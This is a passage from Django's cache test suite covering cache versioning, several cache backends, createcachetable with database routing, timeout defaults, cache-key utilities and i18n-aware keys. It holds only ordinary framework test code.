                         {'ford2': 37, 'arthur2': 42})

        # v2 set, using default version = 2
        caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
        self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
        self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
        self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2),
                         {'ford3': 37, 'arthur3': 42})

        self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']),
                         {'ford3': 37, 'arthur3': 42})
        self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
        self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
                         {'ford3': 37, 'arthur3': 42})

        # v2 set, default version = 2, but manually override version = 1
        caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
        self.assertEqual(cache.get_many(['ford4', 'arthur4']),
                         {'ford4': 37, 'arthur4': 42})
        self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1),
                         {'ford4': 37, 'arthur4': 42})
        self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})

        self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
        self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
                         {'ford4': 37, 'arthur4': 42})
        self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})

    def test_incr_version(self):
        cache.set('answer', 42, version=2)
        self.assertEqual(cache.get('answer'), None)
        self.assertEqual(cache.get('answer', version=1), None)
        self.assertEqual(cache.get('answer', version=2), 42)
        self.assertEqual(cache.get('answer', version=3), None)

        self.assertEqual(cache.incr_version('answer', version=2), 3)
        self.assertEqual(cache.get('answer'), None)
        self.assertEqual(cache.get('answer', version=1), None)
        self.assertEqual(cache.get('answer', version=2), None)
        self.assertEqual(cache.get('answer', version=3), 42)

        caches['v2'].set('answer2', 42)
        self.assertEqual(caches['v2'].get('answer2'), 42)
        self.assertEqual(caches['v2'].get('answer2', version=1), None)
        self.assertEqual(caches['v2'].get('answer2', version=2), 42)
        self.assertEqual(caches['v2'].get('answer2', version=3), None)

        self.assertEqual(caches['v2'].incr_version('answer2'), 3)
        self.assertEqual(caches['v2'].get('answer2'), None)
        self.assertEqual(caches['v2'].get('answer2', version=1), None)
        self.assertEqual(caches['v2'].get('answer2', version=2), None)
        self.assertEqual(caches['v2'].get('answer2', version=3), 42)

        self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')

    def test_decr_version(self):
        cache.set('answer', 42, version=2)
        self.assertEqual(cache.get('answer'), None)
        self.assertEqual(cache.get('answer', version=1), None)
        self.assertEqual(cache.get('answer', version=2), 42)

        self.assertEqual(cache.decr_version('answer', version=2), 1)
        self.assertEqual(cache.get('answer'), 42)
        self.assertEqual(cache.get('answer', version=1), 42)
        self.assertEqual(cache.get('answer', version=2), None)

        caches['v2'].set('answer2', 42)
        self.assertEqual(caches['v2'].get('answer2'), 42)
        self.assertEqual(caches['v2'].get('answer2', version=1), None)
        self.assertEqual(caches['v2'].get('answer2', version=2), 42)

        self.assertEqual(caches['v2'].decr_version('answer2'), 1)
        self.assertEqual(caches['v2'].get('answer2'), None)
        self.assertEqual(caches['v2'].get('answer2', version=1), 42)
        self.assertEqual(caches['v2'].get('answer2', version=2), None)

        self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)

    def test_custom_key_func(self):
        # Two caches with different key functions aren't visible to each other
        cache.set('answer1', 42)
        self.assertEqual(cache.get('answer1'), 42)
        self.assertEqual(caches['custom_key'].get('answer1'), None)
        self.assertEqual(caches['custom_key2'].get('answer1'), None)

        caches['custom_key'].set('answer2', 42)
        self.assertEqual(cache.get('answer2'), None)
        self.assertEqual(caches['custom_key'].get('answer2'), 42)
        self.assertEqual(caches['custom_key2'].get('answer2'), 42)

    def test_cache_write_unpickable_object(self):
        update_middleware = UpdateCacheMiddleware()
        update_middleware.cache = cache

        fetch_middleware = FetchFromCacheMiddleware()
        fetch_middleware.cache = cache

        request = self.factory.get('/cache/test')
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data, None)

        response = HttpResponse()
        content = 'Testing cookie serialization.'
        response.content = content
        response.set_cookie('foo', 'bar')

        update_middleware.process_response(request, response)

        get_cache_data = fetch_middleware.process_request(request)
        self.assertNotEqual(get_cache_data, None)
        self.assertEqual(get_cache_data.content, content.encode('utf-8'))
        self.assertEqual(get_cache_data.cookies, response.cookies)

        # caching the cached response again must also round-trip cleanly
        update_middleware.process_response(request, get_cache_data)
        get_cache_data = fetch_middleware.process_request(request)
        self.assertNotEqual(get_cache_data, None)
        self.assertEqual(get_cache_data.content, content.encode('utf-8'))
        self.assertEqual(get_cache_data.cookies, response.cookies)

    def test_add_fail_on_pickleerror(self):
        "See https://code.djangoproject.com/ticket/21200"
        with self.assertRaises(pickle.PickleError):
            cache.add('unpickable', Unpickable())

    def test_set_fail_on_pickleerror(self):
        "See https://code.djangoproject.com/ticket/21200"
        with self.assertRaises(pickle.PickleError):
            cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.db.DatabaseCache',
    # Spaces are used in the table name to ensure quoting/escaping is working
    LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
    # Full cache-API suite run against the database backend.
    # TransactionTestCase is needed: test_clear_commits_transaction below
    # manipulates the transaction state directly.

    available_apps = ['cache']

    def setUp(self):
        # The super calls needs to happen first for the settings override.
        super(DBCacheTests, self).setUp()
        self.create_table()

    def tearDown(self):
        # The super call needs to happen first because it uses the database.
        super(DBCacheTests, self).tearDown()
        self.drop_table()

    def create_table(self):
        # Create the cache table non-interactively so the run never blocks.
        management.call_command('createcachetable', verbosity=0, interactive=False)

    def drop_table(self):
        with connection.cursor() as cursor:
            # Quote the name: it deliberately contains spaces (see LOCATION).
            table_name = connection.ops.quote_name('test cache table')
            cursor.execute('DROP TABLE %s' % table_name)

    def test_zero_cull(self):
        self._perform_cull_test(caches['zero_cull'], 50, 18)

    def test_second_call_doesnt_crash(self):
        # Re-running createcachetable must be a no-op: one "already exists"
        # message per configured cache.
        stdout = six.StringIO()
        management.call_command(
            'createcachetable',
            stdout=stdout
        )
        self.assertEqual(stdout.getvalue(),
            "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))

    def test_createcachetable_with_table_argument(self):
        """
        Delete and recreate cache table with legacy behavior (explicitly
        specifying the table name).
        """
        self.drop_table()
        stdout = six.StringIO()
        management.call_command(
            'createcachetable',
            'test cache table',
            verbosity=2,
            stdout=stdout
        )
        self.assertEqual(stdout.getvalue(),
            "Cache table 'test cache table' created.\n")

    def test_clear_commits_transaction(self):
        # Ensure the database transaction is committed (#19896)
        cache.set("key1", "spam")
        cache.clear()
        transaction.rollback()
        self.assertEqual(cache.get("key1"), None)
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
    """Re-run the whole database-cache suite with USE_TZ enabled."""
class DBCacheRouter(object):
    """A router that puts the cache table on the 'other' database."""

    def _is_cache_model(self, model):
        # Everything in the django_cache app lives on the 'other' alias.
        return model._meta.app_label == 'django_cache'

    def db_for_read(self, model, **hints):
        if self._is_cache_model(model):
            return 'other'

    def db_for_write(self, model, **hints):
        if self._is_cache_model(model):
            return 'other'

    def allow_migrate(self, db, model):
        if self._is_cache_model(model):
            return db == 'other'
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
            'LOCATION': 'my_cache_table',
        },
    },
)
class CreateCacheTableForDBCacheTests(TestCase):
    # Needs access to both databases so the router can redirect the table.
    multi_db = True

    def test_createcachetable_observes_database_router(self):
        old_routers = router.routers
        try:
            # Install a router that sends django_cache models to 'other'.
            router.routers = [DBCacheRouter()]
            # cache table should not be created on 'default'
            with self.assertNumQueries(0, using='default'):
                management.call_command('createcachetable',
                                        database='default',
                                        verbosity=0, interactive=False)
            # cache table should be created on 'other'
            # Queries:
            #   1: check table doesn't already exist
            #   2: create the table
            #   3: create the index
            with self.assertNumQueries(3, using='other'):
                management.call_command('createcachetable',
                                        database='other',
                                        verbosity=0, interactive=False)
        finally:
            # Always restore the original router chain.
            router.routers = old_routers
class PicklingSideEffect(object):
    """Helper whose pickling records whether the cache's write lock was held.

    The locmem backend pickles values when storing them; if pickling happens
    while the write lock is held (#20613/#18541), __getstate__ sees active
    writers and flips ``locked`` to True.
    """

    def __init__(self, cache):
        self.cache = cache
        self.locked = False

    def __getstate__(self):
        # Invoked by pickle during cache.set()/cache.add(); snapshot whether
        # the cache's lock currently has active writers.
        if self.cache._lock.active_writers:
            self.locked = True
        return {}
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
    """Full cache-API suite against the local-memory backend."""

    def setUp(self):
        super(LocMemCacheTests, self).setUp()
        # LocMem requires a hack to make the other caches
        # share a data store with the 'normal' cache.
        for alias in ('prefix', 'v2', 'custom_key', 'custom_key2'):
            caches[alias]._cache = cache._cache
            caches[alias]._expire_info = cache._expire_info

    @override_settings(CACHES={
        'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
        'other': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'other'
        },
    })
    def test_multiple_caches(self):
        "Check that multiple locmem caches are isolated"
        cache.set('value', 42)
        self.assertEqual(caches['default'].get('value'), 42)
        self.assertIsNone(caches['other'].get('value'))

    def test_locking_on_pickle(self):
        """#20613/#18541 -- Ensures pickling is done outside of the lock."""
        poisoned = PicklingSideEffect(cache)
        cache.set('set', poisoned)
        self.assertFalse(poisoned.locked, "Cache was locked during pickling")

        cache.add('add', poisoned)
        self.assertFalse(poisoned.locked, "Cache was locked during pickling")

    def test_incr_decr_timeout(self):
        """incr/decr does not modify expiry time (matches memcached behavior)"""
        key = 'value'
        full_key = cache.make_key(key)
        cache.set(key, 1, timeout=cache.default_timeout * 10)
        original_expiry = cache._expire_info[full_key]
        # Neither operation may touch the stored expiration timestamp.
        for mutate in (cache.incr, cache.decr):
            mutate(key)
            self.assertEqual(original_expiry, cache._expire_info[full_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
# Scan all configured caches; if several point at memcached, the last
# matching entry wins.
for _cache_params in settings.CACHES.values():
    if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
        memcached_params = _cache_params
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
    """Full cache-API suite against a live memcached server (if configured)."""

    def test_invalid_keys(self):
        """
        On memcached, we don't introduce a duplicate key validation
        step (for speed reasons), we just let the memcached API
        library raise its own exception on bad keys. Refs #6447.

        In order to be memcached-API-library agnostic, we only assert
        that a generic exception of some kind is raised.
        """
        # memcached does not allow whitespace or control characters in keys
        self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
        # memcached limits key length to 250
        self.assertRaises(Exception, cache.set, 'a' * 251, 'value')

    # Explicitly display a skipped test if no configured cache uses MemcachedCache
    @unittest.skipUnless(
        memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
        "cache with python-memcached library not available")
    def test_memcached_uses_highest_pickle_version(self):
        # Regression test for #19810
        # The loop variable was renamed from ``cache``: it shadowed the
        # module-level default cache object inside this method.
        for cache_key, cache_config in settings.CACHES.items():
            if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
                self.assertEqual(caches[cache_key]._cache.pickleProtocol,
                                 pickle.HIGHEST_PROTOCOL)

    def test_cull(self):
        # culling isn't implemented, memcached deals with it.
        pass

    def test_zero_cull(self):
        # culling isn't implemented, memcached deals with it.
        pass
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
    """
    Specific test cases for the file-based cache.
    """
    def setUp(self):
        super(FileBasedCacheTests, self).setUp()
        # Point every configured cache at a fresh temporary directory.
        self.dirname = tempfile.mkdtemp()
        for cache_params in settings.CACHES.values():
            cache_params.update({'LOCATION': self.dirname})

    def tearDown(self):
        shutil.rmtree(self.dirname)
        super(FileBasedCacheTests, self).tearDown()

    def test_ignores_non_cache_files(self):
        fname = os.path.join(self.dirname, 'not-a-cache-file')
        with open(fname, 'w'):
            os.utime(fname, None)
        cache.clear()
        self.assertTrue(os.path.exists(fname),
                        'Expected cache.clear to ignore non cache files')
        os.remove(fname)

    def test_clear_does_not_remove_cache_dir(self):
        cache.clear()
        self.assertTrue(os.path.exists(self.dirname),
                        'Expected cache.clear to keep the cache dir')

    def test_creates_cache_dir_if_nonexistent(self):
        os.rmdir(self.dirname)
        cache.set('foo', 'bar')
        # Bug fix: the original evaluated os.path.exists() without asserting
        # its result, so this test could never fail.
        self.assertTrue(os.path.exists(self.dirname),
                        'Expected cache.set to recreate the cache dir')
@override_settings(CACHES={
    'default': {
        'BACKEND': 'cache.liberal_backend.CacheClass',
    },
})
class CustomCacheKeyValidationTests(TestCase):
    """
    Tests for the ability to mixin a custom ``validate_key`` method to
    a custom cache backend that otherwise inherits from a builtin
    backend, and override the default key validation. Refs #6447.
    """
    def test_custom_key_validation(self):
        # Longer than 250 characters AND containing spaces: the liberal
        # backend's validate_key must accept it anyway.
        long_spaced_key = 'some key with spaces' * 15
        stored_value = 'a value'
        cache.set(long_spaced_key, stored_value)
        self.assertEqual(cache.get(long_spaced_key), stored_value)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'cache.closeable_cache.CacheClass',
        }
    }
)
class GetCacheTests(IgnorePendingDeprecationWarningsMixin, TestCase):
    """Tests for the deprecated get_cache() function."""

    def test_simple(self):
        from django.core.cache import caches, get_cache
        # get_cache('default') must return an instance of the same backend
        # class as the caches['default'] handler.
        self.assertIsInstance(
            caches[DEFAULT_CACHE_ALIAS],
            get_cache('default').__class__
        )

        # Extra keyword arguments are forwarded to the backend.
        cache = get_cache(
            'django.core.cache.backends.dummy.DummyCache',
            **{'TIMEOUT': 120}
        )
        self.assertEqual(cache.default_timeout, 120)

        self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')

    def test_close(self):
        from django.core import signals
        # The closeable test backend records close(); the request_finished
        # signal must trigger it.
        self.assertFalse(cache.closed)
        signals.request_finished.send(self.__class__)
        self.assertTrue(cache.closed)

    def test_close_deprecated(self):
        from django.core.cache import get_cache
        from django.core import signals
        cache = get_cache('cache.closeable_cache.CacheClass')
        self.assertFalse(cache.closed)
        # Caches obtained via the deprecated API get closed on
        # request_finished as well.
        signals.request_finished.send(self.__class__)
        self.assertTrue(cache.closed)
# Settings for a single in-memory cache with the TIMEOUT parameter unset.
DEFAULT_MEMORY_CACHES_SETTINGS = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': 'unique-snowflake',
    }
}
# Same settings with TIMEOUT explicitly None ("never expire"); deepcopy so
# mutating the nested dict doesn't leak into the dict above.
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
    """Tests that verify that settings having Cache arguments with a TIMEOUT
    set to `None` will create Caches that will set non-expiring keys.

    This fixes ticket #22085.
    """
    def setUp(self):
        # The 5 minute (300 seconds) default expiration time for keys is
        # defined in the implementation of the initializer method of the
        # BaseCache type.
        self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout

    def tearDown(self):
        # ``del`` is a statement, not a function — parentheses dropped.
        del self.DEFAULT_TIMEOUT

    def test_default_expiration_time_for_keys_is_5_minutes(self):
        """The default expiration time of a cache key is 5 minutes.

        This value is defined inside the __init__() method of the
        :class:`django.core.cache.backends.base.BaseCache` type.
        """
        # assertEquals is a deprecated alias — use assertEqual.
        self.assertEqual(300, self.DEFAULT_TIMEOUT)

    def test_caches_with_unset_timeout_has_correct_default_timeout(self):
        """Caches that have the TIMEOUT parameter undefined in the default
        settings will use the default 5 minute timeout.
        """
        cache = caches[DEFAULT_CACHE_ALIAS]
        self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
        """Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings with have `None` as the default timeout.

        This means "no timeout".
        """
        cache = caches[DEFAULT_CACHE_ALIAS]
        self.assertIs(None, cache.default_timeout)
        self.assertIsNone(cache.get_backend_timeout())

    @override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
    def test_caches_with_unset_timeout_set_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter unset will set cache
        keys having the default 5 minute timeout.
        """
        key = "my-key"
        value = "my-value"
        cache = caches[DEFAULT_CACHE_ALIAS]
        cache.set(key, value)
        cache_key = cache.make_key(key)
        self.assertIsNotNone(cache._expire_info[cache_key])

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter set to `None` will set
        a non expiring key by default.
        """
        # Bug fix: this method was named ``text_caches_...`` — the test runner
        # never collected it, so the assertion below had never actually run.
        key = "another-key"
        value = "another-value"
        cache = caches[DEFAULT_CACHE_ALIAS]
        cache.set(key, value)
        cache_key = cache.make_key(key)
        self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
)
class CacheUtils(TestCase):
    """TestCase for django.utils.cache functions."""

    def setUp(self):
        self.host = 'www.example.com'
        self.path = '/cache/test/'
        self.factory = RequestFactory(HTTP_HOST=self.host)

    def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
        # Build a request flagged so the cache middleware will store the
        # response (a falsy update_cache still means "do cache").
        request = self._get_request(self.host, self.path,
            method, query_string=query_string)
        request._cache_update_cache = True if not update_cache else update_cache
        return request

    def _set_cache(self, request, msg):
        # Push a response with body ``msg`` through the update middleware.
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def test_patch_vary_headers(self):
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            # NOTE(review): the next case duplicates the one two entries
            # above — presumably redundant; verify before removing.
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            response = HttpResponse()
            if initial_vary is not None:
                response['Vary'] = initial_vary
            patch_vary_headers(response, newheaders)
            self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        request = self.factory.get(self.path)
        response = HttpResponse()
        key_prefix = 'localprefix'
        # Expect None if no headers have been set yet.
        self.assertEqual(get_cache_key(request), None)
        # Set headers to an empty list.
        learn_cache_key(request, response)

        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )
        # Verify that a specified key_prefix is taken into account.
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        request = self.factory.get(self.path, {'test': 1})
        response = HttpResponse()
        # Expect None if no headers have been set yet.
        self.assertEqual(get_cache_key(request), None)
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # Verify that the querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_cache_key_varies_by_url(self):
        """
        get_cache_key keys differ by fully-qualfied URL instead of path
        """
        request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
        learn_cache_key(request1, HttpResponse())
        request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
        learn_cache_key(request2, HttpResponse())
        self.assertTrue(get_cache_key(request1) != get_cache_key(request2))

    def test_learn_cache_key(self):
        request = self.factory.head(self.path)
        response = HttpResponse()
        response['Vary'] = 'Pony'
        # Make sure that the Vary header is added to the key hash
        learn_cache_key(request, response)
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_patch_cache_control(self):
        tests = (
            # Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
            (None, {'private': True}, set(['private'])),
            # Test whether private/public attributes are mutually exclusive
            ('private', {'private': True}, set(['private'])),
            ('private', {'public': True}, set(['public'])),
            ('public', {'public': True}, set(['public'])),
            ('public', {'private': True}, set(['private'])),
            ('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
            ('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
            ('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
        )

        cc_delim_re = re.compile(r'\s*,\s*')

        for initial_cc, newheaders, expected_cc in tests:
            response = HttpResponse()
            if initial_cc is not None:
                response['Cache-Control'] = initial_cc
            patch_cache_control(response, **newheaders)
            parts = set(cc_delim_re.split(response['Cache-Control']))
            self.assertEqual(parts, expected_cc)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'KEY_PREFIX': 'cacheprefix',
        },
    },
)
class PrefixedCacheUtils(CacheUtils):
    """Re-run the CacheUtils suite with a KEY_PREFIX configured."""
@override_settings(
    CACHE_MIDDLEWARE_SECONDS=60,
    CACHE_MIDDLEWARE_KEY_PREFIX='test',
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
)
class CacheHEADTest(TestCase):
    """HEAD requests and the cache middleware."""

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def _set_cache(self, request, msg):
        # Push a response with body ``msg`` through the update middleware.
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def test_head_caches_correctly(self):
        test_content = 'test content'

        request = self.factory.head(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        # A second HEAD request is served from the cache.
        request = self.factory.head(self.path)
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertNotEqual(get_cache_data, None)
        self.assertEqual(test_content.encode(), get_cache_data.content)

    def test_head_with_cached_get(self):
        test_content = 'test content'

        request = self.factory.get(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        # A HEAD request is served from the entry that the GET cached.
        request = self.factory.head(self.path)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertNotEqual(get_cache_data, None)
        self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    LANGUAGES=(
        ('en', 'English'),
        ('es', 'Spanish'),
    ),
)
class CacheI18nTest(TestCase):
    """Cache key generation and middleware behavior with i18n/l10n/TZ active."""

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
    def test_cache_key_i18n_translation(self):
        request = self.factory.get(self.path)
        lang = translation.get_language()
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    def check_accept_language_vary(self, accept_language, vary, reference_key):
        # Helper: with the given Accept-Language header and Vary value, both
        # the learned and the looked-up cache key must equal reference_key.
        request = self.factory.get(self.path)
        request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
        request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
        response = HttpResponse()
        response['Vary'] = vary
        key = learn_cache_key(request, response)
        key2 = get_cache_key(request)
        self.assertEqual(key, reference_key)
        self.assertEqual(key2, reference_key)

    @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
    def test_cache_key_i18n_translation_accept_language(self):
        lang = translation.get_language()
        self.assertEqual(lang, 'en')
        request = self.factory.get(self.path)
        request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
        response = HttpResponse()
        response['Vary'] = 'accept-encoding'
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
        # Every Accept-Language spelling and Vary ordering below must produce
        # the same cache key as the request learned above.
        self.check_accept_language_vary(
            'en-us',
            'cookie, accept-language, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'en-US',
            'cookie, accept-encoding, accept-language',
            key
        )
        self.check_accept_language_vary(
            'en-US,en;q=0.8',
            'accept-encoding, accept-language, cookie',
            key
        )
        self.check_accept_language_vary(
            'en-US,en;q=0.8,ko;q=0.6',
            'accept-language, cookie, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
            'accept-encoding, cookie, accept-language',
            key
        )
        self.check_accept_language_vary(
            'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
            'accept-language, accept-encoding, cookie',
            key
        )
        self.check_accept_language_vary(
            'ko;q=1.0,en;q=0.5',
            'cookie, accept-language, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'ko, en',
            'cookie, accept-encoding, accept-language',
            key
        )
        self.check_accept_language_vary(
            'ko-KR, en-US',
            'accept-encoding, accept-language, cookie',
            key
        )

    @override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
    def test_cache_key_i18n_formatting(self):
        request = self.factory.get(self.path)
        lang = translation.get_language()
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
    def test_cache_key_i18n_timezone(self):
        request = self.factory.get(self.path)
        # This is tightly coupled to the implementation,
        # but it's the most straightforward way to test the key.
        tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
        tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    @override_settings(USE_I18N=False, USE_L10N=False)
    def test_cache_key_no_i18n(self):
        request = self.factory.get(self.path)
        lang = translation.get_language()
        tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
        tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
        self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")

    @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
    def test_cache_key_with_non_ascii_tzname(self):
        # Regression test for #17476
        class CustomTzName(timezone.UTC):
            # Mutable class attribute set by the test body below.
            name = ''

            def tzname(self, dt):
                return self.name

        request = self.factory.get(self.path)
        response = HttpResponse()
        with timezone.override(CustomTzName()):
            CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8')  # UTF-8 string
            sanitized_name = 'Hora_estndar_de_Argentina'
            self.assertIn(sanitized_name, learn_cache_key(request, response),
                          "Cache keys should include the time zone name when time zones are active")

            CustomTzName.name = 'Hora estándar de Argentina'  # unicode
            sanitized_name = 'Hora_estndar_de_Argentina'
            self.assertIn(sanitized_name, learn_cache_key(request, response),
                          "Cache keys should include the time zone name when time zones are active")

    @override_settings(
        CACHE_MIDDLEWARE_KEY_PREFIX="test",
        CACHE_MIDDLEWARE_SECONDS=60,
        USE_ETAGS=True,
        USE_I18N=True,
    )
    def test_middleware(self):
        def set_cache(request, lang, msg):
            # Activate ``lang`` and cache a response with body ``msg``.
            translation.activate(lang)
            response = HttpResponse()
            response.content = msg
